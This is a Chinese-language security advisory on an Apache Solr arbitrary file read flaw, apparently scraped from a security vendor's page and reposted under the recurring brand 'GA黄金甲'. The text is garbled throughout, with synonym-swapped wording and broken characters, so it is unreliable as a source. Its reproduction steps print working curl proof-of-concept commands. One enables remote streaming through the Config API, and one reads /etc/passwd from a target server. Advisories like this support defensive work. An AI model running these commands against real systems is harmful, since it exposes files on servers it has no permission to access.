GA黄金甲

GA黄金甲·(中国集团)官方网站

中文

GA黄金甲·(中国集团)官方网站

GA黄金甲·(中国集团)官方网站

登录

GA黄金甲·(中国集团)官方网站

产品

< 返回主菜单

产品

解决规划

< 返回主菜单

解决规划中心

行业

服务支持

合作同伴

关于GA黄金甲

投资者关系

返回主菜单

选择区域/说话

GA黄金甲·(中国集团)官方网站

安全应急｜Apache Solr肆意文件读取缝隙

GA黄金甲·(中国集团)官方网站

颁布功夫：2021-03-21

GA黄金甲·(中国集团)官方网站

近日，GA黄金甲网络安全应急团队检测到Apache Solr存在肆意文件读取缝隙，攻击者能够机关恶意的HTTP要求，对指标服务器上肆意文件进行读取。

Apache Solr是一个开源搜索服务引擎，Solr 使用 Java 说话开发，重要基于 HTTP 和 Apache Lucene 实现。Apace Solr宽泛利用于一些大型门户网站、电子商务网站等都必要站内搜索职能的场景，多部署于公司内网，公网使用量也达到1万多。

影响领域
Apache Solr全版本。

威胁等级
高

POC状态
当前缝隙POC已公开

缝隙注明

缝隙利用必要两步，首先利用Config API打开默认关关的requestDispatcher.requestParsers.enableRemoteStreaming开关，而后进行文件读取。

值妥贴心的是，默认情况下requestDispatcher.requestParsers.enableRemoteStreaming是关关，攻击者并不能进行肆意文件读取。所以官方并不以为这是一个缝隙，但是从攻击者角度来说能够通过Solr提供的Config API远程打开此开关，而后进行攻击，且Apache Solr出产环境下大多维持默认配置，并无身份校验。

缝隙复现

1.接见 Solr Admin 治理员页面

GA黄金甲·(中国集团)官方网站

2.获取core的信息

http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json

GA黄金甲·(中国集团)官方网站

3.选取如下POC：批改配置

curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'http://xxx.xxx.xxx.xxx:8983/solr/fd_20201221/config -H 'Content-type:application/json'

GA黄金甲·(中国集团)官方网站

4. 选取如下poc获取文件内容

curl "http://xxx.xxx.xxx.xxx:8983/solr/ fd_20201221/debug/dump?param=ContentStreams" -F "stream.url=file://etc/passwd"

GA黄金甲·(中国集团)官方网站

建复建议

因厂商暗示暂不建复，GA黄金甲网络安全专家建议直接将solr放内网，以免造成文件信息泄露。

产品解决规划

RG-IDP系列入侵检测防御系统

RG-IDP系列入侵检测防御系统是GA黄金甲推出的将深度内容检测、安全防护、上网行为治理等技术结合的入侵检测防御系统设备。通过对网络中深层攻击行为进行正确的分析判断，自动有效的�；ね绨踩�。RG-IDP系统入侵检测防御系统已支持对该缝隙的检测。

RG-WG系列WebGuard利用�；は低�

GA黄金甲RG-WG WebGuard利用�；は低�，通过对进出Web服务器的HTTP/HTTPS流量有关内容的实时辰析检测、过滤，来精确判定并阻止各类Web利用入侵行为，阻断对Web服务器的恶意接见与犯法操作。RG-WG系列WebGuard利用�；は低骋阎С侄愿梅煜兜募觳�。

团队介绍

GA黄金甲网络CERT安全应急响应团队，跟踪最新互联网威胁事务，针对最新安全缝隙，APT攻击以及僵尸网络家族做实时跟踪和分析；为产品、客户提供实时、有效的安全防护战术与解决规划。

GA黄金甲·(中国集团)官方网站

GA黄金甲“网络+安全”主张将网络设备的安全能力充分阐扬，网络设备、安全设备与安全平台智能联动，握别安全孤岛，组成整网联动的安全保险系统，实现防护、安全预测、分析和响应等安全问题自动化全流程关环。

GA黄金甲·(中国集团)官方网站
如您必要GA黄金甲安全，请留下您的联系方式

关注GA黄金甲

: 关注GA黄金甲官网微信
随时相识公司最新动态

成功案例

查看更多

最新动态

查看更多

有关视频

GA黄金甲·(中国集团)官方网站

GA黄金甲·(中国集团)官方网站

查看更多

售前征询
售后服务
定见反馈

GA黄金甲·(中国集团)官方网站

返回顶部

收起

文档AI副手

文档评价

该资料是否解决了您的问题？

您对当前页面的中意度若何？

不咋滴

极度好

您中意的原因是（多�。�？

您不中意的原因是（多�。�？

您是否还有其他问题或建议？

为了急剧解决并回复您的问题，您能够留下联系方式

邮箱

手机号

我已赞成并阅读隐衷政策

ev-bg

感激您的反�。�

GA黄金甲·(中国集团)官方网站

GA黄金甲·(中国集团)官方网站

GA黄金甲·(中国集团)官方网站

请选择服务项目

售前征询

售后服务

定见反馈

更多联系方式

【网站地图】